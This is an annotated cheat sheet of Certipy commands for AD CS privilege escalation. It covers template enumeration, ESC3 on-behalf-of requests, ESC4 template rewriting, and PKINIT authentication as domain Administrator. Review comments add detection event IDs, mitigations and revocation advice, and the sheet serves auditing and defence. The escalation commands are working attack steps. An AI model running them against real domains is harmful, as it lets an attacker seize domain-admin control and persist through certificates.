Certificates

  • Enumerate certificate templates (AD CS)

# Lists the AD CS certificate templates that USER can see, querying the DC at
# DC_IP. -stdout prints the report to the terminal and -vulnerable keeps only
# the templates Certipy flags as misconfigured for this user.
# NOTE(review): Certipy documents the last option as -enabled (enabled
# templates only); -enable presumably resolves through option-prefix
# matching. Confirm against the installed version.
# -p puts the password in argv, where shell history and the local process
# list expose it.
# The same query run with a low-privileged account is how a defender audits
# their own templates; every finding it prints is a template to fix.
certipy find -dc-ip DC_IP -u 'USER' -p 'PASSWORD' -stdout -vulnerable -enable
  • Request a certificate

# Requests a certificate from the CA named 'CA' using template Template,
# authenticating as USER. -target is the host the request is sent to and
# -debug turns on verbose output.
# Detection: with Certificate Services auditing enabled, the CA logs event
# 4886 when the request is received and 4887 when the certificate is issued.
# The requester and template in those events are what to correlate on.
certipy req -dc-ip DC_IP -u 'USER' -p 'PASSWORD' -target DC-01.domain.dc -ca 'CA' -template Template -debug
  • Request an administrator certificate via an ESC3 (enrollment agent) misconfiguration

# ESC3: -pfx presents an existing certificate (user.pfx) as the enrollment
# agent, and -on-behalf-of asks the CA to issue a 'User' certificate for
# domain\Administrator instead of for the requester.
# NOTE(review): the page does not show how user.pfx was obtained; presumably
# it comes from a template carrying the Certificate Request Agent EKU.
# Mitigation: do not leave Certificate Request Agent templates enrollable by
# broad groups, and configure enrollment-agent restrictions on the CA so an
# agent can only enrol for named principals and templates.
certipy req -dc-ip DC_IP -u 'USER' -p 'PASSWORD' -target DC-01.domain.dc -ca 'CA' -template 'User' -on-behalf-of 'domain\Administrator' -pfx user.pfx -debug
  • Request an administrator certificate via an ESC4 (template write access) misconfiguration

# ESC4: the user holds write rights on the template object itself.
# This first command changes production AD CS state: it overwrites
# TEMPLATE_NAME's configuration in the directory, and -save-old writes the
# previous configuration to a local file first.
# The template stays weakened for every principal allowed to enrol until that
# saved configuration is written back; the page does not show this restore.
# NOTE(review): Certipy 4.x reads the saved JSON back with -configuration.
# Confirm for the installed version.
# Detection: the template change is a directory object modification (event
# 5136 where DS change auditing covers the Certificate Templates container),
# and the CA can report it as event 4899 on a later enrolment.
# Mitigation: remove write/owner rights on templates from non-admin principals.
certipy template -u "user@domain" -p "password" -dc-ip "DC_IP" -template TEMPLATE_NAME -save-old
# Requests a certificate from the modified template; -upn sets the identity
# asked for in the certificate.
# NOTE(review): 'domain admin' is a placeholder, not UPN syntax
# (user@domain). DC01.domain.hc here and DC-01.domain.dc in the earlier
# examples are likewise placeholders for the same kind of target host.
certipy req -u "user@domain" -p "password" -dc-ip "DC_IP" -target "DC01.domain.hc" -ca 'CA_NAME' -template 'TEMPLATE_NAME' -upn 'domain admin'
# Same on-behalf-of request shape as the ESC3 example, presenting
# 'domain admin.pfx' as the agent certificate.
# NOTE(review): presumably that file is the output of the previous request;
# the page does not say so. Confirm.
certipy req -dc-ip DC_IP -u 'user' -p 'password' -target DC01.domain.hc -ca 'CA_NAME' -template 'User' -on-behalf-of 'domain\Administrator' -pfx 'domain admin.pfx' -debug
  • Authenticate with the certificate

# Authenticates to the domain with the certificate and key in
# administrator.pfx (Kerberos PKINIT).
# NOTE(review): none of the earlier commands names its output file, so
# administrator.pfx is presumably the default output name of the preceding
# request. Confirm.
# Detection: the DC logs the ticket request as event 4768 with the
# certificate issuer, serial number and thumbprint fields filled in.
# Response: a password reset does not invalidate an issued certificate. It
# stays usable until it expires or is revoked at the CA, so revoke it and
# treat every .pfx on disk as secret key material.
certipy auth -pfx administrator.pfx
